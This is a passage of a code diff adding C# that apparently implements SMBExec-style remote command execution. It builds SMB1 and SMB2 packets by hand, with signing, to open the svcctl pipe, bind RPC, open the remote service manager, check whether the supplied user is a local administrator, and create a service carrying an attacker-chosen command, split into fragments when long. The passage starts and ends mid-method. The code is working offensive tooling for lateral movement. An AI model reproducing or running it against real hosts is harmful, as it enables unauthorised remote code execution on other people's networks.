+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                    }
+                                    break;
+                                case "CloseRequest":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "TreeDisconnect";
+                                    }
+                                    break;
+                                case "TreeDisconnect":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBTreeDisconnectRequest();
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "Logoff";
+                                    }
+                                    break;
+                                case "Logoff":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, process_ID_Bytes, SMB_user_ID);
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBLogoffAndXRequest();
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "exit";
+                                    }
+                                    break;
+                            }
+
+                        }
+                    }
+                    else
+                    {
+                        SMBClientStage = "TreeConnect";
+                        while (SMBClientStage != "exit" && SMBExec_failed == false)
+                        {
+                            if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
+                            switch (SMBClientStage)
+                            {
+                                case "TreeConnect":
+                                    {
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2TreeConnectRequest(SMB_path_bytes);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "CreateRequest";
+                                    }
+                                    break;
+                                case "CreateRequest":
+                                    {
+                                        SMB2_tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
+                                        SMB_named_pipe_bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2CreateRequestFile(SMB_named_pipe_bytes);
+                                        packet_SMB2_data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "RPCBind";
+                                    }
+                                    break;
+                                case "RPCBind":
+                                    {
+                                        SMB_named_pipe_bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
+                                        SMB2_message_ID++;
+                                        SMB_file_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadRequest";
+                                        SMB_client_stage_next = "OpenSCManagerW";
+                                    }
+                                    break;
+                                case "ReadRequest":
+                                    {
+                                        Thread.Sleep(sleep * 1000);
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        packet_SMB2_header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2ReadRequest(SMB_file_ID);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
+                                        {
+                                            SMBClientStage = SMB_client_stage_next;
+                                        }
+                                        else
+                                        {
+                                            SMBClientStage = "StatusPending";
+                                        }
+
+                                    }
+                                    break;
+
+                                case "StatusPending":
+                                    {
+                                        SMBClientStream.Read(SMBClientReceive, 0, SMBClientReceive.Length);
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
+                                        {
+                                            SMBClientStage = SMB_client_stage_next;
+                                        }
+                                    }
+                                    break;
+                                case "OpenSCManagerW":
+                                    {
+                                        SMB2_message_ID = 30;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        OrderedDictionary packet_SCM_data = SMBExec.SCMOpenSCManagerW(SMB_service_bytes, SMB_service_length);
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        int RPC_data_Length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadRequest";
+                                        SMB_client_stage_next = "CheckAccess";
+
+                                    }
+                                    break;
+
+                                case "CheckAccess":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 127)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
+                                        {
+                                            SMB_service_manager_context_handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
+                                            if (SMB_execute)
+                                            {
+                                                OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
+                                                SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                                if (SCM_data.Length < SMB_split_index)
+                                                {
+                                                    SMBClientStage = "CreateServiceW";
+                                                }
+                                                else
+                                                {
+                                                    SMBClientStage = "CreateServiceW_First";
+                                                }
+                                            }
+                                            else
+                                            {
+
+                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target));
+                                                SMB2_message_ID += 20;
+                                                SMB_close_service_handle_stage = 2;
+                                                SMBClientStage = "CloseServiceHandle";
+                                            }
+
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "05-00-00-00")
+                                        {
+                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", output_username, target));
+                                            SMBExec_failed = true;
+                                        }
+                                        else
+                                        {
+                                            output.AppendLine(String.Format("Something went wrong with {0}", target));
+                                            SMBExec_failed = true;
+                                        }
+
+                                    }
+                                    break;
+                                case "CreateServiceW":
+                                    {
+                                        if (SMBExec_command.Length < SMB_split_index)
+                                        {
+                                            SMB2_message_ID += 20;
+                                            packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                            packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                            if (SMB_signing)
+                                            {
+                                                packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            }
+                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
+                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                            OrderedDictionary packet_SMB_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
+                                            byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                            byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            int RPC_data_Length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
+                                            OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_Length);
+                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                            if (SMB_signing)
+                                            {
+                                                HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                                byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                                byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                                SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                                packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                                SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            }
+                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMBClientStage = "ReadRequest";
+                                            SMB_client_stage_next = "StartServiceW";
+
+                                        }
+                                    }
+                                    break;
+                                case "CreateServiceW_First":
+                                    {
+                                        SMB_split_stage_final = Math.Ceiling((double)SCM_data.Length / SMB_split_index);
+                                        SMB2_message_ID += 20;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+
+                                        byte[] SCM_data_first = Utilities.GetByteRange(SCM_data, 0, SMB_split_index - 1);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_first);
+                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length);
+                                        SMB_split_index_tracker = SMB_split_index;
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+
+                                        if (SMB_split_stage_final <= 2)
+                                        {
+                                            SMBClientStage = "CreateServiceW_Last";
+                                        }
+                                        else
+                                        {
+                                            SMB_split_stage = 2;
+                                            SMBClientStage = "CreateServiceW_Middle";
+                                        }
+                                    }
+                                    break;
+
+                                case "CreateServiceW_Middle":
+                                    {
+                                        SMB_split_stage++;
+                                        SMB2_message_ID++;
+                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
+                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                        }
+                                        byte[] SCM_data_middle = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SMB_split_index_tracker + SMB_split_index - 1);
+                                        SMB_split_index_tracker += SMB_split_index;
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_middle);
+                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length - SMB_split_index_tracker + SMB_split_index);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
+                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
+                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
+                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        if (SMB_split_stage >= SMB_split_stage_final)
+                                        {
+                                            SMBClientStage = "CreateServiceW_Last";
+                                        }
+                                        else
+                                        {
